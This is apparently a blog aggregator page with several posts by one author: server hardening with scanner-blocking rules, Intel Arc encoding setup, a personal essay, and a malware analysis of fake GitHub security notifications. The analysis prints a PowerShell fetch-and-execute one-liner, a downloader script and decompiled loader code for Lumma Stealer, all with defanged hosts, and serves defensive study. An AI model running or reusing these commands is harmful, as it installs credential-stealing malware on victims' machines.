Full Width [alt+shift+f] Shortcuts [alt+shift+k]
Sign Up [alt+shift+s] Log In [alt+shift+l]
15
Let's talk about some of the simple & practical steps you can take to improve your GitHub account security. There's plenty of good reasons why you should try to keep any online account safe, but I feel that GitHub deserves special attention among developers. With automation through CI and CD taking center stage, it's not only important to you but also anybody who might rely on your code to ensure your GitHub account is secure. The Basics Let's start with the basics, things that don't just apply to GitHub but to nearly any online service. Passwords Let's face it, passwords freaking suck. We all know we're supposed to make them hard to guess and not to reuse them, but who has time to remember each and every password? Nobody, that's who. But what if there was a solution where you could have unique passwords for each of your accounts, not have to remember them all, and have strong passwords that are difficult for both humans and computers alike to guess? The solution is a Password Manager....
over a year ago

Improve your reading experience

Logged in users get linked directly to articles resulting in a better reading experience. Please login for free, it takes less than 1 minute.

More from Ian's Blog

Securing My Web Infrastructure

Securing My Web Infrastructure A few months ago, I very briefly mentioned that I've migrated all my web infrastructure off Cloudflare, as well as having built a custom web service to host it all. I call this new web service WebCentral and I'd like to talk about some of the steps I've taken and lessons I've learned about how I secure my infrastructure. Building a Threat Model Before you can work to secure any service, you need to understand what your threat model is. This sounds more complicated than it really is; all you must do is consider what your risks how, how likely those risks are to be realized, and what the potential damage or impact those risks could have. My websites don't store or process any user data, so I'm not terribly concerned about exfiltration, instead my primary risks are unauthorized access to the server, exploitation of my code, and denial of service. Although the risks of denial of service are self-explanatory, the primary risk I see needing to protect against is malicious code running on the machine. Malicious actors are always looking for places to run their cryptocurrency miners or spam botnets, and falling victim to that is simply out of the question. While I can do my best to try and ensure I'm writing secure code, there's always going to be the possibility that I or someone else makes a mistake that turns into an exploitable weakness. Therefore, my focus is on minimizing the potential impact should this occur. VPS Security The server that powers the very blog you're reading is a VPS, virtual private server, hosted by Azure. A VPS is just a fancy way to say a virtual machine that you have mostly total control over. A secure web service must start with a secure server hosting it, so let's go into detail about all the steps I take to keep the server safe. Network Security Minimizing the internet-facing exposure is critical for any VPS and can be one of the most effective ways to keep a machine safe. My rule is simple, no open ports other than what is required for user traffic. In effect this only means one thing: I cannot expose SSH to the internet. Doing so protects me against a wide range of threats and also reduces the impact from scanners (more on them later). While Azure itself offers several of ways to interact with a running VPS, I've chosen to disable most of those features and instead rely on my own. I personally need to be able to access the machine over SSH, however, so how do I do that if SSH is blocked? I use a VPN. On my home network is a WireGuard VPN server as well as a Dynamic DNS setup to work-around my rotating residential IP address. The VM will try to connect to the WireGuard VPN on my home network and establish a private tunnel between them. Since the VM is the one initiating the connection (acting as a client) no port must be exposed. With this configuration I can effortlessly access and manage the machine without needing to expose SSH to the internet. I'm also experimenting with, but have not yet fully rolled out, an outbound firewall. Outbound firewalls are far, far more difficult to set up than inbound because you must first have a very good understanding of what and where your machine talks to. OS-Level Security Although the internet footprint of my VPS is restricted to only HTTP and HTTPS, I still must face the risk of someone exploiting a vulnerability in my code. I've taken a few steps to help minimize the impact from a compromise to my web application's security. Automatic Updates First is some of the most basic things everyone should be doing, automatic updates & reboots. Every day I download and install any updates and restart the VPS if needed. All of this is trivially easy with a cron job and built-in tooling. I use this script that runs using a cron job: #!/bin/bash # Check for updates dnf check-update > /dev/null if [[ $? == 0 ]]; then # Nothing to update exit 0 fi # Install updates dnf -y update # Check if need to reboot dnf needs-restarting -r if [[ $? == 1 ]]; then reboot fi Low-Privileged Accounts Second, the actual process serving traffic does not run as root, instead it runs as a dedicated service user without a shell and without sudo permission. Doing this limits the abilities of what an attacker might be able to do, should they somehow have the ability to execute shell code on the machine. A challenge with using non-root users for web services is a specific security restriction enforced by Linux: only the root user can bind to port at or below 1024. Thankfully, however, SystemD services can be granted additional capabilities, one of which is the capability to bind to privileged ports. A single line in the service file is all it takes to overcome this challenge. Filesystem Isolation Lastly, the process also uses a virtualized root filesystem, a process known as chroot(). Chrooting is a method where the Linux kernel effectively lies to the process about where the root of the filesystem is by prepending a path to every call to access the filesystem. To chroot a process, you provide a directory that will act as the filesystem root for that process, meaning if the process were to try and list of contents of the root (/), they'd instead be listing the contents of the directory you specified. When configured properly, this has the effect of an filesystem allowlist - the process is only allowed to access data in the filesystem that you have specifically granted for it, and all of this without complicated permissions. It's important to note, however, that chrooting is often misunderstood as a more involved security control, because it's often incorrectly called a "jail" - referring to BSD's jails. Chrooting a process only isolates the filesystem from the process, but nothing else. In my specific use case it serves as an added layer of protection to guard against simple path transversal bugs. If an attacker were somehow able to trick the server into serving a sensitive file like /etc/passwd, it would fail because that file doesn't exist as far as the process knows. For those wondering, my SystemD service file looks like this: [Unit] Description=webcentral After=syslog.target After=network.target [Service] # I utilize systemd's heartbeat feature, sd-notify Type=notify NotifyAccess=main WatchdogSec=5 # This is the directory that serves as the virtual root for the process RootDirectory=/opt/webcentral/root # The working directory for the process, this is automatically mapped to the # virtual root so while the process sees this path, in actuality it would be # /opt/webcentral/root/opt/webcentral WorkingDirectory=/opt/webcentral # Additional directories to pass through to the process BindReadOnlyPaths=/etc/letsencrypt # Remember all of the paths here are being mapped to the virtual root ExecStart=/opt/webcentral/live/webcentral -d /opt/webcentral/data --production ExecReload=/bin/kill -USR2 "$MAINPID" TimeoutSec=5000 Restart=on-failure # The low-privilege service user to run the process as User=webcentral Group=webcentral # The additional capability to allow this process to bind to privileged ports CapabilityBoundingSet=CAP_NET_BIND_SERVICE [Install] WantedBy=default.target To quickly summarize: Remote Access (SSH) is blocked from the internet, a VPN must be used to access the VM, updates are automatically installed on the VM, the web process itself runs as a low-privileged service account, and the same process is chroot()-ed to shield the VMs filesystem. Service Availability Now it's time to shift focus away from the VPS to the application itself. One of, if not the, biggest benefits of running my own entire web server means that I can deeply integrate security controls how I best see fit. For this, I focus on detection and rejection of malicious clients. Being on the internet means you will be constantly exposed to malicious traffic - it's just a fact of life. The overwhelming majority of this traffic is just scanners, people going over every available IP address and looking widely known and exploitable vulnerabilities, things like leaving credentials out in the open or web shells. Generally, these scanners are one and done - you'll see a small handful of requests from a single address and then never again. I find that trying to block or prevent these scanners is a bit of a fool's errand, however by tracking these scanners over time I can begin to identify patterns to proactively block them early, saving resources. Why this matters is not because of the one-and-done scanners, but instead the malicious ones, the ones that don't just send a handful of requests - they send hundreds, if not thousands, all at once. These scanners risk degrading the service for others by occupying server resources that would better be used for legitimate visitors. To detect malicious hosts, I employ some basic heuristic by focusing on the headers sent by the client, and the paths they're trying to access. Banned Paths Having collected months of data from the traffic I served, I was able to identify some of the most common paths these scanners are looking for. One of the more common treds I see if scanning for weak and vulnerable WordPress configurations. WordPress is an incredibly common content management platform, which also makes it a prime target for attackers. Since I don't use WordPress (and perhaps you shouldn't either...) this made it a good candidate for scanner tracking. Therefore, any request where the path contains any of: "wp-admin", "wp-content", "wp-includes", or "xmlrpc.php" are flagged as malicious and recorded. User Agents The User Agent header is data sent by your web browser to the server that provides a vague description of the browser and the device it's running on. For example, my user agent when I wrote this post is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 All this really tells the server is that I'm on a Mac running macOS 15 and using Firefox 128. One of the most effective measures I've found to block malicious traffic early is to do some very basic filtering by user agent. The simplest and most effective measure thus far has been to block requests that have no user agent header. I also have a growing list of bogus user agent values, where the header looks valid - but if you check the version numbers of the system or browser, nothing lines up. IP Firewall When clients start getting a bit too rowdy, they get put into the naughty corner temporarily blocked from connecting. Blocked connections happen during the TCP handshake, saving resources as we skip the TLS negotiation. Addresses are blocked 24 hours, and I found this time to be perfectly adequate as most clients quickly give up and move on. ASN Blocks In some extreme situations, it's necessary to block entire services and all of their addresses from accessing my server. This happens when a network provider, such as an ISP, VPN, or cloud provider, fails to do their job in preventing abuse of their services and malicious find home there. Cloud providers have a responsibility to ensure that if a malicious customer is using their service, they would terminate their accounts and stop providing their services. For the most part, these cloud providers do a decent enough job at that. Some providers, however, don't care - at all - and quickly become popular amongst malicious actors. Cloudflare and Alibaba are two great examples. Because of the sheer volume of malicious traffic and total lack of valid user traffic, I block all of Cloudflare and Alibaba's address space. Specifically, I block AS13335 and AS45102. Putting It All Together Summarized, this is the path a request takes when connecting to my server: Upon recieving a TCP connection, the IP address of the client is checked if it's either in a blocked ASN or is individually blocked. If so, the request is quickly rejected. Otherwise, TLS is negotiated, allowing the server to see the details of the actual HTTP request. We then check if the request is for a banned path, or has a banned user agent, if so the IP is blocked for 24 hours and the request is rejected, otherwise the request is served as normal. The Result I feel this graph speaks for itself: This graph shows the number of requests that were blocked per minute. These bursts are the malicious scanners that I'm working to block, and all of these were successful defences against them. This will be a never-ending fight, but that's part of the fun, innit?

2 months ago 24 votes
Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relativly painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post is to document what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you. Driver Setup The drivers for Intel Arc cards were added into the Linux Kernel in version 6.2 or later, but RHEL 9 uses kernel version 5. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9. Add the Intel Repo Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists. [intel-graphics-9.4-unified] name=Intel graphics 9.4 unified enabled=1 gpgcheck=1 baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/ gpgkey=https://repositories.intel.com/gpu/intel-graphics.key Run dnf clean all for good measure. Install the Software dnf install intel-opencl \ intel-media \ intel-mediasdk \ libmfxgen1 \ libvpl2 \ level-zero \ intel-level-zero-gpu \ mesa-dri-drivers \ mesa-vulkan-drivers \ mesa-vdpau-drivers \ libdrm \ mesa-libEGL \ mesa-lib Reboot your machine for good measure. Verify Device Availability You can verify that your GPU is seen using the following: clinfo | grep "Device Name" Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics ffmpeg Setup Install ffmpeg ffmpeg needs to be compiled with libvpl support. For simplicities sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary. Verify ffmpeg support If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following: ./ffmpeg -hide_banner -encoders|grep "qsv" V..... av1_qsv AV1 (Intel Quick Sync Video acceleration) (codec av1) V..... h264_qsv H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264) V..... hevc_qsv HEVC (Intel Quick Sync Video acceleration) (codec hevc) V..... mjpeg_qsv MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg) V..... mpeg2_qsv MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video) V..... vp9_qsv VP9 video (Intel Quick Sync Video acceleration) (codec vp9) If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly. Converting a Video I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container. I'll skip doing any other transformations to the video for now, just to keep things simple. ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4 The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes: Encoder Time Average FPS h264_qsv (Hardware) 3.02s 296 libx264 (Software) 1m2.996s 162 Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there's lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.

8 months ago 33 votes
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites made me feel a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience. The Start Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But thats a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010's were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024. Graphic Design was Never My Passion 2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't really care about so much about the final product more as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as what I was interested in grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered 4 months of the most dysfunctional Art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself. Changing Interests As my interests changed, my focus on the site became less about the design and appearance and more towards what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore. When Things Stopped Being Fun Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and Scaling. Cloudflare A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors. All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues, at least with the focus of this blog post, with Cloudflare. For example, before Lets Encrypt existed, Cloudflare did not allow for TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either, as even though Cloudflare now offers free TLS - they have total control over everything and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster. Scaling (or lack thereof) The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, using global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, not even just exclusive for websites - people think that they need to be concerned about scaling problems without first asking if those problems even or will ever apply to them. If I was able to host my website from an abused desktop tower with blown caps on cable internet just fine, then why in the world would I need to be obsessing over telemetry and response times. Sadly things only got even worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently I was using complicated file integrity checks using hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder why I ended up making my site look like a resume when doing any changes to it was so much work? The Lesson I Learned All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, and unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me down to the realization of the true root cause of my misery: In an attempt to try and mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and come up with a much better, simpler, and most of all enjoyable design. How my Website Used to Work The last design of my website that existed before I came to the conclusions I discussed above was as follows: My website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was being run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registries. Cloudflare sat in-front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to Github. A Github action would then deploy that image to Azure Container Registries and trigger the container to restart, pulling the new image. How my Website Works Now Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now: Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Lets Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but - crucially - nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's almost virtually identical to the way I was doing things in 2013, and it's been almost invigorating to shed this excess weight and unnecessary complications. But there's actually a whole lot going on behind the scenes that I'm omitting from this graph. Static Websites Are Boring A huge problem with my previous design is that I had locked myself into only having a pure static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites is usually dependent on Javascript and doing them in the users browser. That's lame. Let's take a really simple example: Sometimes I want to show a banner on the top of my website. In a static-only website, unless you hard-code that banner into the HTML, doing this from a static site would require that you use JavaScript to check some backend if a banner should be displayed, and if so - render it. But on a dynamic page? Where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from using containers, which are ephemeral and immutable, over to using a virtual machine, which isn't, and to go back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but instead my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this - but I've written enough about websites for one day. Wrapping Up That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from my self-imposed judgement or concern over non-issues. Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

8 months ago 30 votes
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub, most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request, or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you - it's happened to me. Twice. In one day. Let me break down how this attack works: The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos The attacker quickly deletes the issue You receive a notification email as the owner of the repo You click the link in the email, thinking it's legitimate You follow the instructions and infect your system with malware Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got: In text form (link altered for your safety): Hey there! We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say: Unfortunately the remaining parts of the email that aren't controlled by the attacker don't provide us with any sufficient amount of context to know what's actually going on here. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from Github, it passes most of the common phishing checks. The email is from Github, and the link in the email goes to where it says it does. GitHub can improve on these notification emails to reduce the effectiveness of this type of attack by providing more context about what action is the email for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted Github security (the real one, not the fake imposter one) and shared these emails with them along with my concerns. The Website If you were to follow through with the link on that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human not that out of the ordinary. What is out of the ordinary is how the captcha works. Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site is asking you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware. The Malware The site put the following text in my clipboard (link modified for your safety): powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752" We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is equal to calling curl | bash. A comment is at the end of the file that, due to the Windows run box being limited in window size, effectively hides the first part of the script, so the user only sees this: Between the first email I got and the time of writing, the URL in the script have changed, but the contents remain the same. Moving onto the second stage, the contents of the evaluated script file are (link modified for your safety): $webClient = New-Object System.Net.WebClient $url1 = "[https://]github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature to it. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid - meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature itself is interesting, because it's highlighted two weaknesses with Windows that this malware exploits. I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of the file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag to alter settings to behave differently. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the mark of the web. Step back for a moment and you'll recall that it's not the browser that is downloading this malicious exe, instead it's PowerShell - or, more specifically, it's the System.Net.WebClient class in .NET Framework. This class has a method, DownloadFile which does exactly that - downloads a file to a local path, except this method does not set the MOTW flag for the downloaded file. Take a look at this side by side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right: This exposes the other weakness in Windows; Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the mark of the web. It is unwise to rely on the mark of the web in any way, as it's trivially easy to remove that flag. Had the .NET library set that flag, the attacker could have easily just removed it before starting the process. Both of these weaknesses have been reported to Microsoft, but for us we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does. I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There's two parts of the code that matter, the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, then marks a region of memory as executable with VirtualProtect and then executes it with CallWindowProcW. private static void Main(string[] args) { Resolver resolver = new Resolver("Consulter", 100); Program.FreeConsole(); double num = (double) Program.UAdhuyichgAUIshuiAuis(); Task.Run((Action) (() => { Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco); Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key); })); Thread.Sleep(1000); uint ASxcgtjy = 0; Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy); int index = 392; Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0); } The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used, and the first byte array is a data buffer and the second is labeled as key - this, plus the amount of math they're doing, gives it away that is is some form of decryptor, though I'm not good enough at math to figure out what algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW and compiled the rest of the code and ran it in a debugger, so that I could examine the contents of the two decrypted buffers. The first buffer contains a call to CreateProcess 00000000 55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72 U...7.......user 00000010 33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F 32.dll.CreatePro 00000020 63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C cessA.VirtualAll 00000030 6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74 oc.GetThreadCont 00000040 65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D ext.ReadProcessM 00000050 65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C emory.VirtualAll 00000060 6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73 ocEx.WriteProces 00000070 73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61 sMemory.SetThrea 00000080 64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54 dContext.ResumeT 00000090 68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00 hread.9...¼..... 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73 ......C:\Windows 000000C0 5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46 \Microsoft.NET\F 000000D0 72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30 ramework\v4.0.30 000000E0 33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37 319\RegAsm.exe.7 [...] And the second buffer, well, just take a look at the headers you might just see what's going on :) 00000000 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00 MZx............. 00000010 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 ............x... 00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..º..´.Í!¸.LÍ!Th 00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00000070 6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00 mode.$..PE..L... So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks it as executable, and then executes it. Marvelous. Sadly, this is where I hit a wall as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers where the gang can then move on to either stealing money from you, or profit from selling your data online. Lumma's malware tends to not encrypt victims devices such as traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma. If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in Github's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were: Windows Sandbox Ghidra dotPeek HxD Visual Studio Updates: Previously I said that the codesigning certificate was stolen from Spotify, however after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

9 months ago 23 votes
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations. Looking Back I joined Cohost in October of 2022 when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account and switched to using Cohost only for a time and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, not built on advertising, corporate greed, privacy invasion - but instead on a focus of people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made, it's the dark cloud that has now formed over people who shared their vision, the rise of the question of "why bother". When I look back to my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts of trying to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to now realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like count meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with. The Alternatives Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult to understand web of protocols, services, terminology, and dogma. It suffers from critical "open source brain worm" where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" 